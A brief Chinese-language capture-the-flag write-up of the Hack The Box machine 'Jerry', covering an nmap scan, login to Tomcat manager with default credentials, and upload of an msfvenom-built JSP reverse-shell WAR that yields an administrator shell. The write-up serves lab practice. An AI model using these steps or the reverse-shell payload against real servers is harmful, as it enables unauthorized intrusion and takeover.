Hack The Box::Jerry

2024-02-01 15:11:34

0x00 信息收集

nmap -Pn -sV -p- -T 4 10.10.10.95

PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1

8080端口是tomcat默认的界面,通常尝试账号密码爆破
Hack The Box::Jerry
使用默认口令tomcat/s3cret成功登录manager界面
Hack The Box::Jerry
进入后台后,可以发现上传点
Hack The Box::Jerry

0x01 漏洞利用

利用msfvenom生成jsp格式的shell,并上传war包
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f war > shell.war
Hack The Box::Jerry
可以在后台中看到shell的路径
Hack The Box::Jerry
访问http://10.10.10.95/shell,成功得到shell,而且是管理员权限。
Hack The Box::Jerry

上一篇:Hack The Box::Shocker


下一篇:CTF web每日一题